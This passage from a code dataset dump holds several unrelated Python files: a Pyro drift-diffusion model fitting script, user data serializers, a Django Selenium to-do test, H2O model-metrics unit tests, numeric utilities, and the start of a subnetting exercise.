torch.tensor(self.out_of_bounds_val))\n\n # a constraint\n logp_squeezed = torch.where(net_in[:, :, :, 1] < torch.tensor(2.5),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, :, 1] > torch.tensor(0.3), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n # z constraint\n logp_squeezed = torch.where(net_in[:, :, :, 2] < torch.tensor(0.9),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, :, 2] > torch.tensor(0.1),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n # t constraint\n logp_squeezed = torch.where(net_in[:, :, :, 3] < torch.tensor(2.0), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, :, 3] > torch.tensor(0.0),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n \n logp_squeezed = logp_squeezed #.unsqueeze(1)\n \n else: # single particle:\n tmp_params = torch.stack([self.v, self.a, self.z, self.t], \n dim = -1).tile((self.n_samples, 1, 1))\n\n net_in = torch.cat([tmp_params, value], dim = -1)\n logp = torch.clip(self.net(net_in), min = -16.11)\n logp_squeezed = torch.squeeze(logp, dim = -1)\n\n # v constraint\n logp_squeezed = torch.where(net_in[:, :, 0] < torch.tensor(3.),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, 0] > torch.tensor(-3.), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n # a constraint\n logp_squeezed = torch.where(net_in[:, :, 1] < torch.tensor(2.5),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, 1] > torch.tensor(0.3), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n # z constraint\n logp_squeezed = torch.where(net_in[:, :, 2] < torch.tensor(0.9),\n logp_squeezed,\n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, 2] > torch.tensor(0.1), \n logp_squeezed,\n torch.tensor(self.out_of_bounds_val))\n\n # t constraint\n logp_squeezed = 
torch.where(net_in[:, :, 3] < torch.tensor(2.0),\n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n logp_squeezed = torch.where(net_in[:, :, 3] > torch.tensor(0.0), \n logp_squeezed, \n torch.tensor(self.out_of_bounds_val))\n\n return logp_squeezed\n \ndef hierarchical_ddm_model(num_subjects, num_trials, data):\n #v_mu_mu = pyro.sample(\"v_mu_mu\", dist.Uniform(-3, 3))\n v_mu_mu = pyro.sample(\"v_mu_mu\", dist.Normal(0, 0.5))\n v_mu_std = pyro.sample(\"v_mu_std\", dist.HalfNormal(100.))\n \n #a_mu_mu = pyro.sample(\"a_mu_mu\", dist.Uniform(0.3, 2.5))\n a_mu_std = pyro.sample(\"a_mu_std\", dist.HalfNormal(100.))\n a_mu_mu = pyro.sample(\"a_mu_mu\", dist.Normal(1.5, 0.5))\n\n #z_mu_mu = pyro.sample(\"z_mu_mu\", dist.Uniform(0.1, 0.9))\n z_mu_std = pyro.sample(\"z_mu_std\", dist.HalfNormal(100.))\n z_mu_mu = pyro.sample(\"z_mu_mu\", dist.Normal(0.5, 0.1))\n \n #t_mu_mu = pyro.sample(\"t_mu_mu\", dist.Uniform(0.0, 2.0))\n t_mu_std = pyro.sample(\"t_mu_std\", dist.HalfNormal(100.))\n t_mu_mu = pyro.sample(\"t_mu_mu\", dist.Normal(1.0, 0.5))\n\n with pyro.plate(\"subjects\", num_subjects) as subjects_plate:\n v_subj = pyro.sample(\"v_subj\", dist.Normal(v_mu_mu, v_mu_std))\n a_subj = pyro.sample(\"a_subj\", dist.Normal(a_mu_mu, a_mu_std))\n z_subj = pyro.sample(\"z_subj\", dist.Normal(z_mu_mu, z_mu_std))\n t_subj = pyro.sample(\"t_subj\", dist.Normal(t_mu_mu, t_mu_std))\n with pyro.plate(\"data\", num_trials) as data_plate:\n return pyro.sample(\"obs\", \n MyDDMh(v_subj, a_subj, z_subj, t_subj), \n obs = data) \n \nif __name__ == \"__main__\":\n\n# # Interface ----\n# CLI = argparse.ArgumentParser()\n# CLI.add_argument(\"--config_file\",\n# type = none_or_str,\n# default = None)\n# CLI.add_argument('--config_dict_key',\n# type = none_or_int,\n# default = None)\n \n# args = CLI.parse_args()\n# print(args)\n \n \n # # Load torch net ----------------\n # Model\n \n model = \"ddm\" # for now only DDM (once we have choice probability models --> all models applicable)\n model_config = ssms.config.model_config[model].copy() # convenience\n \n \n network_config = pickle.load(open('nets/d27193a4153011ecb76ca0423f39a3e6_' + \\\n 'ddm_torch__network_config.pickle', 'rb'))\n\n print(network_config)\n\n # Initialize network class\n torch_net = TorchMLP(network_config = network_config,\n input_shape = len(model_config['params']) + 2,\n generative_model_id = None)\n\n # Load weights and biases\n torch_net.load_state_dict(torch.load('nets/d27193a4153011ecb76ca0423f39a3e6_' + \\\n 'ddm_torch_state_dict.pt', \n map_location=torch.device('cpu')))\n\n # Turn torch network usable for us\n custom_torch_net = CustomTorchMLPMod(torch_net.state_dict(), \n network_config)\n custom_torch_net.eval()\n \n \n # Generate Data\n base_dim = 1\n n_subjects = 20\n n_samples_by_subject = 500\n buffer_coefficient = 0.5\n\n param_dict = {}\n data_list = []\n for param in model_config['params']:\n param_idx = model_config['params'].index(param)\n print('param')\n print(param)\n min_ = model_config['param_bounds'][0][param_idx]\n max_ = model_config['param_bounds'][1][param_idx]\n range_ = max_ - min_\n mean_ = (max_ + min_) / 2\n min_adj = mean_ - (0.5 * buffer_coefficient) * range_\n print(min_adj)\n max_adj = mean_ + (0.5 * buffer_coefficient) * range_\n print(max_adj)\n\n param_mu_mu = np.random.uniform(low = min_adj, high = max_adj) # potentially fix\n param_mu_std = np.random.uniform(low = 0.05, high = 0.1) # potentially fix\n param_mu = scipy.stats.norm.rvs(loc = param_mu_mu, scale = param_mu_std)\n param_std = 
scipy.stats.halfnorm.rvs(loc = 0, scale = 0.1) # potentially fix\n # param_std_std = scipy.stats.halfnorm(loc = 0, scale = 0.25) # potentially fix\n\n params_subj = np.random.normal(loc = param_mu, \n scale = param_std, \n size = n_subjects)\n\n param_dict[param + '_mu'] = param_mu.astype(np.float32)\n param_dict[param + '_std'] = param_std.astype(np.float32)\n param_dict[param + '_subj'] = params_subj.astype(np.float32)\n\n print(param_dict)\n\n for i in range(n_subjects):\n v = torch.zeros(base_dim) + param_dict['v_subj'][i]\n a = torch.zeros(base_dim) + param_dict['a_subj'][i]\n z = torch.zeros(base_dim) + param_dict['z_subj'][i]\n t = torch.zeros(base_dim) + param_dict['t_subj'][i]\n\n theta = torch.vstack([v, a, z, t]).T\n theta = theta.tile((n_samples_by_subject, 1))\n out = sim_wrap(theta = theta)\n # theta = torch.hstack([theta, out])\n data_list.append(out)\n \n data = torch.stack(data_list).permute(1, 0, 2)\n\n # NUTS VERSION\n from pyro.infer import MCMC, NUTS\n network = custom_torch_net\n num_chains = 4\n\n nuts_kernel = NUTS(hierarchical_ddm_model,\n step_size = 0.01,\n max_tree_depth = 5)\n #jit_compile = True,\n #ignore_jit_warnings = True)\n #max_tree_depth = 1)\n \n mcmc = MCMC(nuts_kernel, \n num_samples = 100, \n warmup_steps = 100, \n num_chains = num_chains, \n initial_params = {'v_mu_mu': torch.tensor(param_dict['v_mu']).repeat(num_chains, 1),\n 'v_mu_std': torch.tensor(param_dict['v_std']).repeat(num_chains, 1),\n 'a_mu_mu': torch.tensor(param_dict['a_mu']).repeat(num_chains, 1),\n 'a_mu_std': torch.tensor(param_dict['a_std']).repeat(num_chains, 1),\n 'z_mu_mu': torch.tensor(param_dict['z_mu']).repeat(num_chains, 1),\n 'z_mu_std': torch.tensor(param_dict['z_std']).repeat(num_chains, 1),\n 't_mu_mu': torch.tensor(param_dict['t_mu']).repeat(num_chains, 1),\n 't_mu_std': torch.tensor(param_dict['t_std']).repeat(num_chains, 1),\n 'v_subj': torch.tensor(param_dict['v_subj']).repeat(num_chains, 1),\n 'a_subj': torch.tensor(param_dict['a_subj']).repeat(num_chains, 1),\n 'z_subj': torch.tensor(param_dict['z_subj']).repeat(num_chains, 1),\n 't_subj': torch.tensor(param_dict['t_subj']).repeat(num_chains, 1),\n }\n )\n \n\n start_t = time()\n mcmc.run(n_subjects, n_samples_by_subject, data)\n end_t = time()\n \n # Make arviz data\n az_mcmc = az.from_pyro(mcmc)\n az_mcmc.posterior.attrs['runtime'] = end_t - start_t\n \n # Save arviz data:\n my_uuid = uuid.uuid1().hex\n pickle.dump(az_mcmc, \n open('/users/afengler/data/proj_lan_varinf/LAN_varinf/data/parameter_recovery/pyro_mcmc_' + my_uuid, 'wb'), \n protocol = 3) \n \n print('DONE')","repo_name":"AlexanderFengler/LAN_scripts","sub_path":"graveyard/pyro_multiprocessing_test.py","file_name":"pyro_multiprocessing_test.py","file_ext":"py","file_size_in_byte":17414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"74630648835","text":"from typing import List, Dict\nfrom application.models.models import UserWord, UserStat, User\n\ndef serialize_user_words(words: List[UserWord]) -> List[Dict]: \n user_words = []\n for word in words: \n user_words.append({\n \"word_id\": word.word_id, \n \"user_id\": word.user_id, \n \"word\": word.word, \n \"word_type\": word.word_type, \n \"category\": word.category, \n \"definition\": word.definition, \n \"translated_language\": word.translated_language, \n \"translation\": word.translation, \n \"created_at\": word.created_at, \n \"correct\": word.correct, \n \"incorrect\": word.incorrect\n })\n if len(user_words) == 1: \n return 
[user_words[0]]\n return user_words\n\ndef serialize_word_with_score(word: UserWord, score: float) -> Dict:\n return {\n \"word_id\": word.word_id, \n \"user_id\": word.user_id, \n \"word\": word.word, \n \"word_type\": word.word_type, \n \"category\": word.category, \n \"definition\": word.definition, \n \"translated_language\": word.translated_language, \n \"translation\": word.translation, \n \"created_at\": word.created_at, \n \"correct\": word.correct, \n \"incorrect\": word.incorrect, \n \"score\": score\n }\n\ndef serialize_user_stats(stats: UserStat) -> Dict:\n serialized_data = {\n \"stat_id\": stats.stat_id, \n \"user_id\": stats.user_id, \n \"challenge_wins\": stats.challenge_wins, \n \"total_words_added\": stats.total_words_added, \n \"total_words_practiced\": stats.total_words_practiced, \n \"correct\": stats.correct, \n \"incorrect\": stats.incorrect\n }\n return serialized_data\n\ndef serialize_user(user: User) -> Dict: \n serialized_data = { \n \"user_id\": user.user_id, \n \"first_name\": user.first_name, \n \"last_name\": user.last_name, \n \"email\": user.email\n }\n return serialized_data\n","repo_name":"j0sh-k1m/vocabi","sub_path":"backend/application/utils/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3151038000","text":"from django.test import LiveServerTestCase\nfrom django.http import HttpRequest\nfrom django.template.loader import render_to_string\nfrom django.core.urlresolvers import reverse\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nfrom todo.views import home\nfrom lists.models import Item\n\n\nclass HomeTestCase(LiveServerTestCase):\n\n def setUp(self):\n\n self.browser = webdriver.Firefox()\n self.browser.get(self.live_server_url)\n\n def tearDown(self):\n\n self.browser.quit()\n\n def check_for_row_in_list_table(self, row_text):\n # find to_do list in table\n\n table = self.browser.find_element_by_id('id_list_table')\n rows = table.find_elements_by_tag_name('tr')\n self.assertIn(row_text, [row.text for row in rows])\n\n def test_check_my_table(self):\n\n # Edith connects to the site\n self.assertIn('To-Do', self.browser.title)\n\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys('공작깃털 사기')\n inputbox.send_keys(Keys.ENTER)\n\n edith_list_url = self.browser.current_url\n self.assertRegex(edith_list_url, '/lists/.+')\n self.check_for_row_in_list_table('1: 공작깃털 사기')\n\n self.browser.get(self.live_server_url)\n\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys('공작깃털을 이용해서 그물 만들기')\n inputbox.send_keys(Keys.ENTER)\n\n self.check_for_row_in_list_table('2: 공작깃털을 이용해서 그물 만들기')\n self.check_for_row_in_list_table('1: 공작깃털 사기')\n\n self.browser.quit()\n self.browser = webdriver.Firefox()\n self.browser.get(self.live_server_url)\n\n # Francis comes in\n inputbox = self.browser.find_element_by_id('id_new_item')\n inputbox.send_keys('우유 사기')\n inputbox.send_keys(Keys.ENTER)\n\n francis_list_url = self.browser.current_url\n self.assertRegex(francis_list_url, '/lists/.+')\n self.assertNotEqual(francis_list_url, edith_list_url)\n\n page_text = self.browser.find_element_by_tag_name('body').text\n self.assertNotIn('공작깃털 사기', page_text)\n self.assertIn('우유 사기', 
page_text)\n","repo_name":"yevgnenll/todo","sub_path":"todo/functional_tests/home_tests.py","file_name":"home_tests.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13351071464","text":"import sys\nsys.path.insert(1, \"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators import H2OGradientBoostingEstimator\nfrom h2o.model import H2OBinomialModelMetrics\nfrom h2o.estimators import H2OUpliftRandomForestEstimator\n\nbase_metric_methods = ['aic', 'loglikelihood', 'auc', 'gini', 'logloss', 'mae', 'mean_per_class_error', 'mean_residual_deviance', 'mse',\n 'nobs', 'aucpr', 'pr_auc', 'r2', 'rmse', 'rmsle',\n 'residual_deviance', 'residual_degrees_of_freedom', 'null_deviance', 'null_degrees_of_freedom']\nmax_metrics = list(H2OBinomialModelMetrics.maximizing_metrics)\n\n\ndef pyunit_make_metrics(weights_col=None):\n fr = h2o.import_file(pyunit_utils.locate(\"smalldata/logreg/prostate.csv\"))\n fr[\"CAPSULE\"] = fr[\"CAPSULE\"].asfactor()\n fr[\"RACE\"] = fr[\"RACE\"].asfactor()\n fr.describe()\n\n response = \"AGE\"\n predictors = list(set(fr.names) - {\"ID\", response})\n\n weights = None\n if weights_col:\n weights = h2o.assign(fr.runif(42), \"weights\")\n fr[weights_col] = weights\n\n print(\"\\n\\n======= REGRESSION ========\\n\")\n for distr in [\"gaussian\", \"poisson\", \"laplace\", \"gamma\"]:\n # Skipping on `laplace`\n # GBM training fails due to a bug: https://github.com/h2oai/h2o-3/issues/8158\n if weights_col is not None and distr == \"laplace\":\n continue\n print(\"distribution: %s\" % distr)\n model = H2OGradientBoostingEstimator(distribution=distr, ntrees=2, max_depth=3,\n min_rows=1, learn_rate=0.1, nbins=20, weights_column=weights_col)\n model.train(x=predictors, y=response, training_frame=fr)\n predicted = h2o.assign(model.predict(fr), \"pred\")\n actual = fr[response]\n\n m0 = model.model_performance(train=True)\n m1 = h2o.make_metrics(predicted, actual, distribution=distr, weights=weights)\n m2 = h2o.make_metrics(predicted, actual, weights=weights)\n print(\"model performance:\")\n print(m0)\n print(\"make_metrics (distribution=%s):\" % distr)\n print(m1)\n print(\"make_metrics (distribution=None):\")\n print(m2)\n\n assert abs(m0.mae() - m1.mae()) < 1e-5\n assert abs(m0.mse() - m1.mse()) < 1e-5\n assert abs(m0.rmse() - m1.rmse()) < 1e-5\n assert abs(m0.mean_residual_deviance() - m1.mean_residual_deviance()) < 1e-5\n assert abs(m0.rmsle() - m1.rmsle()) < 1e-5\n\n assert abs(m2.mae() - m1.mae()) < 1e-5\n assert abs(m2.mse() - m1.mse()) < 1e-5\n assert abs(m2.rmse() - m1.rmse()) < 1e-5\n assert (abs(m1.mean_residual_deviance() - m2.mean_residual_deviance()) < 1e-7) == (distr == \"gaussian\")\n assert abs(m2.rmsle() - m1.rmsle()) < 1e-5\n\n print(\"\\n\\n======= BINOMIAL ========\\n\")\n response = \"CAPSULE\"\n predictors = list(set(fr.names) - {\"ID\", response})\n model = H2OGradientBoostingEstimator(distribution=\"bernoulli\", ntrees=2, max_depth=3, min_rows=1,\n learn_rate=0.01, nbins=20, seed=1, weights_column=weights_col)\n model.train(x=predictors, y=response, training_frame=fr)\n predicted = h2o.assign(model.predict(fr)[2], \"pred\")\n actual = h2o.assign(fr[response].asfactor(), \"act\")\n domain = [\"0\", \"1\"]\n\n m0 = model.model_performance(train=True)\n m1 = h2o.make_metrics(predicted, actual, domain=domain, weights=weights)\n m2 = h2o.make_metrics(predicted, actual, weights=weights)\n print(\"m0:\")\n print(m0)\n print(\"m1:\")\n 
print(m1)\n print(\"m2:\")\n print(m2)\n\n assert m0.accuracy()[0][1] + m0.error()[0][1] == 1\n assert len(m0.accuracy(thresholds='all')) == len(m0.fprs)\n\n assert m0.accuracy().value == m1.accuracy().value == m0.accuracy()[0][1]\n assert m0.accuracy().value + m0.error().value == 1\n\n assert isinstance(m0.accuracy(thresholds=0.4).value, float)\n assert m0.accuracy(thresholds=0.4).value == m1.accuracy(thresholds=0.4).value == m0.accuracy(thresholds=0.4)[0][1]\n assert m0.accuracy(thresholds=0.4).value + m0.error(thresholds=0.4).value == 1\n\n assert isinstance(m0.accuracy(thresholds=[0.4]).value, list)\n assert len(m0.accuracy(thresholds=[0.4]).value) == 1\n assert m0.accuracy(thresholds=[0.4]).value[0] == m0.accuracy(thresholds=0.4).value\n\n assert isinstance(m0.accuracy(thresholds=[0.4, 0.5]).value, list)\n assert len(m0.accuracy(thresholds=[0.4, 0.5]).value) == 2\n assert m0.accuracy(thresholds=[0.4, 0.5]).value == [m0.accuracy(thresholds=0.4).value, m0.accuracy(thresholds=0.5).value]\n\n # Testing base metric methods\n # FIXME: check the same failures for other ModelMetrics impl. and then fix'emall or move them out of base class...\n base_metrics_methods_failing_on_H2OBinomialModelMetrics = ['aic', 'loglikelihood', 'mae', 'mean_per_class_error', 'mean_residual_deviance', 'rmsle']\n for metric_method in (m for m in base_metric_methods if m not in base_metrics_methods_failing_on_H2OBinomialModelMetrics):\n m0mm = getattr(m0, metric_method)()\n m1mm = getattr(m1, metric_method)()\n m2mm = getattr(m2, metric_method)()\n\n assert m0mm == m1mm or abs(m0mm - m1mm) < 1e-5, \\\n \"{} is different for model_performance and make_metrics on [0, 1] domain\".format(metric_method)\n assert m1mm == m2mm or abs(m1mm - m2mm) < 1e-5, \\\n \"{} is different for make_metrics on [0, 1] domain and make_metrics without domain\".format(metric_method)\n # FIXME: for binomial mean_per_class_error is strangely accessible as an array\n assert abs(m0.mean_per_class_error()[0][1] - m1.mean_per_class_error()[0][1]) < 1e-5\n assert abs(m2.mean_per_class_error()[0][1] - m1.mean_per_class_error()[0][1]) < 1e-5\n\n failures = 0\n for metric_method in base_metrics_methods_failing_on_H2OBinomialModelMetrics:\n for m in [m0, m1, m2]:\n try:\n assert isinstance(getattr(m, metric_method)(), float)\n except:\n failures += 1\n assert failures == 3 * len(base_metrics_methods_failing_on_H2OBinomialModelMetrics)\n\n # Testing binomial-only metric methods\n binomial_only_metric_methods = ['accuracy', 'F0point5', 'F1', 'F2', 'mcc',\n 'max_per_class_error', 'mean_per_class_error',\n 'precision', 'recall', 'specificity', 'fallout', 'missrate', 'sensitivity',\n 'fpr', 'fnr', 'tpr', 'tnr']\n for metric_method in (m for m in binomial_only_metric_methods):\n # FIXME: not sure that returning a 2d-array is justified when not passing any threshold\n m0mm = getattr(m0, metric_method)()[0]\n m1mm = getattr(m1, metric_method)()[0]\n m2mm = getattr(m2, metric_method)()[0]\n assert m0mm == m1mm or abs(m0mm[1] - m1mm[1]) < 1e-5, \\\n \"{} is different for model_performance and make_metrics on [0, 1] domain\".format(metric_method)\n assert m1mm == m2mm or abs(m1mm[1] - m2mm[1]) < 1e-5, \\\n \"{} is different for make_metrics on [0, 1] domain and make_metrics without domain\".format(metric_method)\n\n # Testing confusion matrix\n cm0 = m0.confusion_matrix(metrics=max_metrics)\n assert len(cm0) == len(max_metrics)\n assert all([any(m in header for header in map(lambda cm: cm.table._table_header, cm0) for m in max_metrics)]), \\\n \"got duplicate CM 
headers, although all metrics are different\"\n cm0t = m0.confusion_matrix(metrics=max_metrics, thresholds=[.3, .6])\n assert len(cm0t) == 2 + len(max_metrics)\n assert 2 == sum([not any(m in header for m in max_metrics) for header in map(lambda cm: cm.table._table_header, cm0t)]), \\\n \"missing or duplicate headers without metric (thresholds only CMs)\"\n assert all([any(m in header for header in map(lambda cm: cm.table._table_header, cm0t) for m in max_metrics)]), \\\n \"got duplicate CM headers, although all metrics are different\"\n\n\n print(\"\\n\\n======= MULTINOMIAL ========\\n\")\n response = \"RACE\"\n predictors = list(set(fr.names) - {\"ID\", response})\n model = H2OGradientBoostingEstimator(distribution=\"multinomial\", ntrees=2, max_depth=3, min_rows=1,\n learn_rate=0.01, nbins=20, weights_column=weights_col, auc_type=\"MACRO_OVR\")\n model.train(x=predictors, y=response, training_frame=fr)\n predicted = h2o.assign(model.predict(fr)[1:], \"pred\")\n actual = h2o.assign(fr[response].asfactor(), \"act\")\n domain = fr[response].levels()[0] \n\n m0 = model.model_performance(train=True)\n m1 = h2o.make_metrics(predicted, actual, domain=domain, weights=weights, auc_type=\"MACRO_OVR\")\n m2 = h2o.make_metrics(predicted, actual, weights=weights, auc_type=\"MACRO_OVR\")\n\n assert abs(m0.mse() - m1.mse()) < 1e-5\n assert abs(m0.rmse() - m1.rmse()) < 1e-5\n assert abs(m0.logloss() - m1.logloss()) < 1e-5\n assert abs(m0.mean_per_class_error() - m1.mean_per_class_error()) < 1e-5\n assert abs(m0.auc() - m1.auc()) < 1e-5\n assert abs(m0.aucpr() - m1.aucpr()) < 1e-5\n\n assert abs(m2.mse() - m1.mse()) < 1e-5\n assert abs(m2.rmse() - m1.rmse()) < 1e-5\n assert abs(m2.logloss() - m1.logloss()) < 1e-5\n assert abs(m2.mean_per_class_error() - m1.mean_per_class_error()) < 1e-5\n assert abs(m2.auc() - m1.auc()) < 1e-5\n assert abs(m2.aucpr() - m1.aucpr()) < 1e-5\n\n\ndef pyunit_make_metrics_uplift():\n print(\"======= UPLIFT BINOMIAL ========\")\n treatment_column = \"treatment\"\n response_column = \"outcome\"\n feature_cols = [\"feature_\"+str(x) for x in range(1,13)]\n\n train = h2o.import_file(pyunit_utils.locate(\"smalldata/uplift/upliftml_train.csv\"))\n train[treatment_column] = train[treatment_column].asfactor()\n train[response_column] = train[response_column].asfactor()\n\n test = h2o.import_file(pyunit_utils.locate(\"smalldata/uplift/upliftml_test.csv\"))\n test[treatment_column] = test[treatment_column].asfactor()\n test[response_column] = test[response_column].asfactor()\n\n nbins = 20\n model = H2OUpliftRandomForestEstimator(\n treatment_column=treatment_column,\n seed=42,\n auuc_nbins=nbins,\n score_each_iteration=True,\n ntrees=3\n )\n\n model.train(y=response_column, x=feature_cols, training_frame=train, validation_frame=test)\n # test on validation data, train metrics are affected by sample rate\n m0 = model.model_performance(valid=True)\n predicted = h2o.assign(model.predict(test)[0], \"pred\")\n actual = test[response_column]\n treatment = test[treatment_column]\n m1 = model.model_performance(test_data=test, auuc_type=\"AUTO\")\n m2 = h2o.make_metrics(predicted, actual, treatment=treatment, auuc_type=\"AUTO\", auuc_nbins=nbins)\n m3 = h2o.make_metrics(predicted, actual, treatment=treatment, auuc_type=\"AUTO\",\n custom_auuc_thresholds=m1.thresholds())\n m4 = h2o.make_metrics(predicted, actual, treatment=treatment, auuc_type=\"AUTO\",\n custom_auuc_thresholds=model.default_auuc_thresholds())\n new_nbins = nbins - 10\n m5 = h2o.make_metrics(predicted, actual, 
treatment=treatment, auuc_type=\"AUTO\", auuc_nbins=new_nbins)\n\n print(\"Model AUUC: {}\".format(model.auuc()))\n print(\"thresholds: {}\".format(model.default_auuc_thresholds()))\n print(\"Model performance AUUC: {}\".format(m0.auuc()))\n print(\"thresholds: {}\".format(m0.thresholds()))\n print(\"Model performance AUUC: {}\".format(m1.auuc()))\n print(\"thresholds: {}\".format(m1.thresholds()))\n print(\"Make AUUC with no custom thresholds: {}\".format(m2.auuc()))\n print(\"thresholds: {}\".format(m2.thresholds()))\n print(\"Make AUUC with custom thresholds from m1: {}\".format(m3.auuc()))\n print(\"thresholds: {}\".format(m3.thresholds()))\n print(\"Make AUUC with custom thresholds from model defaults: {}\".format(m4.auuc()))\n print(\"thresholds: {}\".format(m4.thresholds()))\n print(\"Make AUUC with no custom thresholds but change nbins parameter: {}\".format(m5.auuc()))\n print(\"thresholds: {}\".format(m5.thresholds()))\n\n tol = 1e-5\n\n # default model auuc is calculated from train data, default thresholds are from validation data\n assert abs(model.auuc() - m0.auuc()) > tol\n # model performance calculates new thresholds but from the same data with the same number of bins, so AUUCs are same\n assert abs(m0.auuc() - m1.auuc()) < tol\n # make method calculates new thresholds but from the same data with the same number of bins, so AUUCs are same\n assert abs(m1.auuc() - m2.auuc()) < tol\n # if we use thresholds from performance metric and use it as custom, it makes the same metrics\n assert abs(m1.auuc() - m3.auuc()) < tol\n # make methods with different nbins parameter changes thresholds and AUUC\n assert abs(m3.auuc() - m5.auuc()) > tol\n\n print(\"===========================\")\n\n\ndef suite_model_metrics():\n\n def test_model_metrics_basic():\n pyunit_make_metrics()\n\n def test_model_metrics_weights():\n pyunit_make_metrics(weights_col=\"weights\")\n\n def test_model_metrics_uplift():\n pyunit_make_metrics_uplift()\n\n return [\n test_model_metrics_basic,\n test_model_metrics_weights,\n test_model_metrics_uplift\n ]\n\n\npyunit_utils.run_tests([\n suite_model_metrics()\n])\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_misc/pyunit_make_metrics.py","file_name":"pyunit_make_metrics.py","file_ext":"py","file_size_in_byte":13259,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"738479285","text":"__author__ = 'IntelligentSystem'\n\n\nimport numpy as np\n\n\ndef find_closest(array, target):\n #a must be sorted\n idx = array.searchsorted(target)\n idx = np.clip(idx, 1, len(array)-1)\n left = array[idx-1]\n right = array[idx]\n idx -= target - left < right - target\n return idx\n\n\ndef normList(L, normalizeFrom=0, normalizeTo=1):\n '''normalize values of a list to make its min = normalizeFrom and its max = normalizeTo'''\n vMax = max(L)\n vMin = min(L)\n return [(x-vMin)*(normalizeTo - normalizeFrom) / (vMax - vMin) for x in L]\n\n\ndef normList(L, normalizeFrom=0, normalizeTo=1, vMin=None, vMax=None):\n '''normalize values of a list to make its min = normalizeFrom and its max = normalizeTo'''\n if vMax:\n _vMax = vMax\n else:\n _vMax = max(L)\n\n if vMin:\n _vMin = vMin\n else:\n _vMin = min(L)\n\n return [(x-_vMin)*(normalizeTo - normalizeFrom) / (_vMax - _vMin) for x in L]\n\n\ndef nested_change(item, func):\n if isinstance(item, list):\n return [nested_change(x, func) for x in item]\n return func(item)\n\n\ndef find_points_in_array_with_jitter(array_of_points_to_be_found, array_to_search, 
jitter_around_each_point):\n found_points_in_aoptbf = []\n indices_of_found_points_in_aoptbf = []\n indices_of_found_points_in_searched_array = []\n prev_points_added = 0\n curr_points_added = 0\n not_found_points_in_aoptbf = []\n for index_of_aoptbf in np.arange(len(array_of_points_to_be_found)):\n point_to_be_found = array_of_points_to_be_found[index_of_aoptbf]\n for possible_point in np.arange(point_to_be_found - jitter_around_each_point,\n point_to_be_found + jitter_around_each_point):\n indices_of_possible_point_in_searched_array = np.where(array_to_search == possible_point)[0]\n if len(indices_of_possible_point_in_searched_array) != 0:\n found_points_in_aoptbf.append(array_to_search[indices_of_possible_point_in_searched_array[0]])\n indices_of_found_points_in_aoptbf.append(index_of_aoptbf)\n indices_of_found_points_in_searched_array.append(indices_of_possible_point_in_searched_array[0])\n curr_points_added += 1\n break\n if curr_points_added > prev_points_added:\n prev_points_added = curr_points_added\n else:\n not_found_points_in_aoptbf.append(point_to_be_found)\n print('Points found in array = ' + str(np.shape(found_points_in_aoptbf)[0]))\n print('Percentage = ' + str(100 * (np.shape(found_points_in_aoptbf)[0] / len(array_of_points_to_be_found))) + '% found')\n return found_points_in_aoptbf, indices_of_found_points_in_aoptbf, indices_of_found_points_in_searched_array, not_found_points_in_aoptbf\n","repo_name":"georgedimitriadis/themeaningofbrain","sub_path":"BrainDataAnalysis/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"35467699943","text":"'''\nSubnetting :\n\nWith Class C subnet mask\nInput from user- A) Enter the any / (slash) notation (/24 to /30) of the IPv4 subnet mask\nOutput to be displayed on the terminal/console:\nShow the output on the terminal/console for the following:\n1) Subnet mask for entered / (slash) notation of the IPv4 subnet mask\n2) The maximum number of subnets\n3) Valid host address per subnet\n\nInput from user-\nB) Enter the valid IP address. 
(Input from user-User has to type on terminal/console)\nOutput to be displayed on the terminal/console:\nShow the output on the terminal/console for the following:\n1) The Network Id and Broadcast address for each subnet.\n2) Show the valid host address range with starting and ending addresses.\n\n'''\n\ndef getClassSubNet(classId):\n\tif classId == 'A':\n\t\treturn [255, 0, 0, 0]\n\telif classId == 'B':\n\t\treturn [255, 255, 0, 0]\n\telif classId == 'C':\n\t\treturn [255, 255, 255, 0]\n\ndef getClassSubNetForHost(classId):\n\tif classId == 'A':\n\t\treturn [0, 255, 255, 255]\n\telif classId == 'B':\n\t\treturn [0, 0, 255, 255]\n\telif classId == 'C':\n\t\treturn [0, 0, 0, 255]\n\ndef doAnding(list1, list2):\n\tlist3 = []\n\tfor i in range(len(list1)):\n\t\tlist3.append(list1[i] & list2[i])\n\treturn list3\n\ndef getClass(data):\n\tif data[0] >= 0 and data[0] <= 127: #A\n\t\treturn 'A'\n\telif data[0] >=128 and data[0] <= 191: #B\n\t\treturn 'B'\n\telif data[0] >= 192 and data[0] <= 223: #C\n\t\treturn 'C'\n\telif data[0] >= 224 and data[0] <= 239: #D\n\t\treturn 